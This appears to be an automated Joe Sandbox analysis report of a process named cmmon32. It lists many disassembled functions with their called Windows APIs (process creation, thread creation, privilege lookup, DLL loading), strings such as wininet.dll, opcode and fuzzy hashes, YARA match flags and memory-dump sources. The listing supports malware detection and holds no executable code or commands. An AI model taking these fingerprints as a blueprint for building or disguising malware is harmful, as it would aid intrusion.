Opcode Fuzzy Hash: be7cc515923079eace1a7cb4446c0ea002e20c4ddb329a397a95f46d95026164
Instruction Fuzzy Hash: 9990023520140402F908759C58086460005CBE1315F55F011A6025555EC765D9A16131

Uniqueness

Uniqueness Score: -1.00%

Function 043E2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2D1A

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d40a23c19032a08bc6b5c1ffa6da2b5df03da5009f37209a6a48dee984a9952c
Instruction ID: 8dbe946ebad38a397812811030914b8186702741b06a62bc3987cc0c15329ac7
Opcode Fuzzy Hash: d40a23c19032a08bc6b5c1ffa6da2b5df03da5009f37209a6a48dee984a9952c
Instruction Fuzzy Hash: 5090022D21340002F988715C580860A0005CBD2216F95F415A1016558CCB15D9795321

Uniqueness

Uniqueness Score: -1.00%

Function 043E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2DFA

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e04f899051a5bdf46acfa8df5a7628e6fa41f84ab5e96e9b3457e23c316462f
Instruction ID: 2fcade0ede2aaaa142dafd4f142acea0c17dec7fa2e65e940c44dab07af6e108
Opcode Fuzzy Hash: 6e04f899051a5bdf46acfa8df5a7628e6fa41f84ab5e96e9b3457e23c316462f
Instruction Fuzzy Hash: AC90023520140413F919715C49047070009CBD1255F95E412A1425558D9756DA62A121

Uniqueness

Uniqueness Score: -1.00%

Function 043E2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2DDA

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3200947a8ce4178cbabef7b0f6a63ef51e0be2e9707cbff13b7dc675a8ebbc6f
Instruction ID: 3f26849af57003a67b9cc33dc2687fa02ee3f90e7e7b9750dd84f8c817f6ec98
Opcode Fuzzy Hash: 3200947a8ce4178cbabef7b0f6a63ef51e0be2e9707cbff13b7dc675a8ebbc6f
Instruction Fuzzy Hash: 70900225242441527D4DB15C48045074006DBE1255795E012A2415950C8726E966D621

Uniqueness

Uniqueness Score: -1.00%

Function 043E2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2EAA

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b1ec388824109689785e91770f5afe8e23edc4a6b753aaa1d69c576c62630564
Instruction ID: 158bd9398d005c37daa11549122183ab8718af087e218da4caaa6957ef15483c
Opcode Fuzzy Hash: b1ec388824109689785e91770f5afe8e23edc4a6b753aaa1d69c576c62630564
Instruction Fuzzy Hash: 4390027520140402F948715C48047460005CBD1315F55E011A6065554E8759DEE56665

Uniqueness

Uniqueness Score: -1.00%

Function 043E2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2F3A

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82413d80945c8127d04834b94813c8840f73515149a7b1f3247af3c34e605f9f
Instruction ID: ac77ab5b48e885efca9a9e429f9cbaa39a4bd1388da2bdb17e3932cc1981823c
Opcode Fuzzy Hash: 82413d80945c8127d04834b94813c8840f73515149a7b1f3247af3c34e605f9f
Instruction Fuzzy Hash: F490026534140442F908715C4814B060005CBE2315F55E015E2065554D8719DD626126

Uniqueness

Uniqueness Score: -1.00%

Function 043E2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2FEA

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ddd942ce001c6034c639c20a31c5e31f85be7e0e41cdd438799e4696a41e006b
Instruction ID: 62d5338ceee8f816a68f3c9a32009270085ded0a00ccfeecb642437f96972a2c
Opcode Fuzzy Hash: ddd942ce001c6034c639c20a31c5e31f85be7e0e41cdd438799e4696a41e006b
Instruction Fuzzy Hash: 6B900225211C0042FA08756C4C14B070005CBD1317F55E115A1155554CCB15D9715521

Uniqueness

Uniqueness Score: -1.00%

Function 043E2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2ADA

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de0c59cc4e95c29c81935bd7e226f728ae4c1e7564d939614527ce78a03e3d7b
Instruction ID: 4fbc84f461fe0cd8774377e459ae0246e0a9cc98a75468f5637b74a3e6fd61b8
Opcode Fuzzy Hash: de0c59cc4e95c29c81935bd7e226f728ae4c1e7564d939614527ce78a03e3d7b
Instruction Fuzzy Hash: 5790022921140003290DB55C0B045070046CBD6365355E021F2016550CD721D9715121

Uniqueness

Uniqueness Score: -1.00%

Function 043E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2B6A

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14631393684bb1578b12ebb31e9afaea4968b811e58da032a1a1c27713870e16
Instruction ID: 501d0e122fc40d371b8d35457216320ca8dc71760bf7d5d6e3d9d564146415c6
Opcode Fuzzy Hash: 14631393684bb1578b12ebb31e9afaea4968b811e58da032a1a1c27713870e16
Instruction Fuzzy Hash: CF90026520240003690D715C4814616400ACBE1215B55E021E2015590DC725D9A16125

Uniqueness

Uniqueness Score: -1.00%

Function 043E2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2BFA

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02fa6a7cd52c4163b18004b98c4d60e33259b178466d2a8d23239deca6e640d5
Instruction ID: 64b9941173a1f29dfac6502209d8493c97b36dc2bb0e3ee97210651669702dcd
Opcode Fuzzy Hash: 02fa6a7cd52c4163b18004b98c4d60e33259b178466d2a8d23239deca6e640d5
Instruction Fuzzy Hash: 8990023520140802F988715C480464A0005CBD2315F95E015A1026654DCB15DB6977A1

Uniqueness

Uniqueness Score: -1.00%

Function 043E2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E2BEA

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 84445f413b58bb6f31d55df712a1d15c6d76716163f40f03f9c31588d96f875e
Instruction ID: bab02f8b560575b4cc2726c050509cbaf5a3208310aa1e5d66205b9e97fb9d09
Opcode Fuzzy Hash: 84445f413b58bb6f31d55df712a1d15c6d76716163f40f03f9c31588d96f875e
Instruction Fuzzy Hash: 5490023520544842F948715C4804A460015CBD1319F55E011A1065694D9725DE65B661

Uniqueness

Uniqueness Score: -1.00%

Function 043E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043E35CA

Memory Dump Source

Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true

Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a7423c609c4f4664473a48d081831bf736836532d2da2f6feb1121799f0ec379
Instruction ID: 61accfcc68a508d25d5e87d88ffd716e3083d99975ac0ba0073c5a59c8aff4e5
Opcode Fuzzy Hash: a7423c609c4f4664473a48d081831bf736836532d2da2f6feb1121799f0ec379
Instruction Fuzzy Hash: 3B90023560550402F908715C49147061005CBD1215F65E411A1425568D8795DA6165A2

Uniqueness

Uniqueness Score: -1.00%

Function 00419080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00419128

Strings

wininet.dll, xrefs: 004190DE, 004190E7
net.dll, xrefs: 004190F1, 00419177, 0041914F, 0041915B, 00419183

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
Instruction ID: 2511d3cdde594a459876a10949f18b9dbd63c8e6bbb0d03ebfda35d58ccafa52
Opcode Fuzzy Hash: 3f90cbdbfa848113bdf14e9c4ef4c32a33f53125a7f9dfad81e1e2f8edbaee94
Instruction Fuzzy Hash: 243192B2500345BBD724DF65C885FA7B7B9FB48B04F10811EF62E5B245D634B990CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00419076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00419128

Strings

wininet.dll, xrefs: 004190DE, 004190E7
net.dll, xrefs: 004190F1, 0041914F, 0041915B

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 83c94312b025ac2bb7b086efcd4bd73689efb029c8943fe09f56330635d0dd12
Instruction ID: 9f7f4ee09f666ca45351ad7ce532febd614e12d69ab19ad51d6f4e62b28ca626
Opcode Fuzzy Hash: 83c94312b025ac2bb7b086efcd4bd73689efb029c8943fe09f56330635d0dd12
Instruction Fuzzy Hash: 063193B1900305BBD714DF65C885FA7B7B4FB48704F10801EFA296B245D778A990CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A662 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403AF8), ref: 0041A69D

Strings

.z`, xrefs: 0041A68C, 0041A698

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 476827b4cf0adb22f134cf2721237f9fb703a983405e57083bed56f01b049a5c
Instruction ID: e880f57384980f89cf93d6b95c6378fdede24d9d2de261eb18b1810246b2b0e1
Opcode Fuzzy Hash: 476827b4cf0adb22f134cf2721237f9fb703a983405e57083bed56f01b049a5c
Instruction Fuzzy Hash: A5E022B41003415BEB10FF65D4C04D737A8BF84314F10852EE84D87206C231E066CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0041A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00403AF8), ref: 0041A69D

Strings

.z`, xrefs: 0041A68C, 0041A698

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00000000,?), ref: 0041A65D

Strings

6EA, xrefs: 0041A652, 0041A65C

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00408395 Relevance: 3.2, APIs: 2, Instructions: 168
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0040836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0040838B

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 46bbe230f166738d70dd1b3e221cb68f3ab9afd02103c3f12cb840c2e172bee4
Instruction ID: 513b1df9b156dd44eedd2723c508216830ef1d1bf6efc3dd4786fb69eb0b4070
Opcode Fuzzy Hash: 46bbe230f166738d70dd1b3e221cb68f3ab9afd02103c3f12cb840c2e172bee4
Instruction Fuzzy Hash: 4F51B2B09003099FDB14DF65D985BEB77B8EB48308F10056EF849A7281EB74A945CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408309 Relevance: 3.1, APIs: 2, Instructions: 60threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0040836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0040838B

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a6ae4c924720be0693f46a6fe1e8d3176060a1863f1c584981c537febf6ebbb0
Instruction ID: ed9df0ad3365d2002663fa5c40fef5dff36fce5f5ec99479e5a609c370036d9e
Opcode Fuzzy Hash: a6ae4c924720be0693f46a6fe1e8d3176060a1863f1c584981c537febf6ebbb0
Instruction Fuzzy Hash: 6901B531A8032877E721AA959D43FEF776C5B40F54F04012DFF04BA1C2EAA8690642EA

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0040836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0040838B

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6A4 Relevance: 1.6, APIs: 1, Instructions: 66processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0041A734

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: f48e9605061ef95c130ae55c5b7c429d3ed6ccf99ee4371b4655849f4f4d4fa8
Instruction ID: fc901bcbcb5e177df8cee9a68dec8654dccb0d6a4974547854007943bc96071f
Opcode Fuzzy Hash: f48e9605061ef95c130ae55c5b7c429d3ed6ccf99ee4371b4655849f4f4d4fa8
Instruction Fuzzy Hash: 3C1107B2201208AFDB14DF99CC84EEB77A9EF8D764F158258BA0D97241C630E951CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6DD Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0041A734

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: c13e45fee7b1a59ebeacea8eaec14764a2d5ba402b7909eda1d38e70c04186c7
Instruction ID: ab9373f17537bb0822c0630eda2fc626c3274feab2234124df9164f5bed6cb8e
Opcode Fuzzy Hash: c13e45fee7b1a59ebeacea8eaec14764a2d5ba402b7909eda1d38e70c04186c7
Instruction Fuzzy Hash: 7B01AFB2215108AFCB54DF89DC80EEB77ADAF8C754F158258FA0D97251D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0041A734

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: c0409bc591760e5b86b1b32807d612366400da8e17bcb8cc8f9e0bcd0fd11a44
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: C601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004191B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0040F050,?,?,00000000), ref: 004191EC

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a54d11b82f9491412a8726d74d522cee7080b709242b24c571322f1b65061c98
Instruction ID: eb7c2e9fd60943c498bc6ff8530c5537a6ac12267d17fee8e4adef21c215dba5
Opcode Fuzzy Hash: a54d11b82f9491412a8726d74d522cee7080b709242b24c571322f1b65061c98
Instruction Fuzzy Hash: ECE092773803043AE3306599AC03FE7B39CDB81B34F14002AFA0DEB2C1D999F84142A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0040F1D2,0040F1D2,?,00000000,?,?), ref: 0041A800

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6C7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00408D14,?), ref: 0040F6FB

Memory Dump Source

Source File: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_cmmon32.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 755afa4ffb5bb0d6c596bdb6fd38475aeb2c1e8456628ed37241fa372a659550
Instruction ID: e731fa677bc0404c6222ccbf1c0f572c64fd3d59592b1f35b9d8bd7759612df5
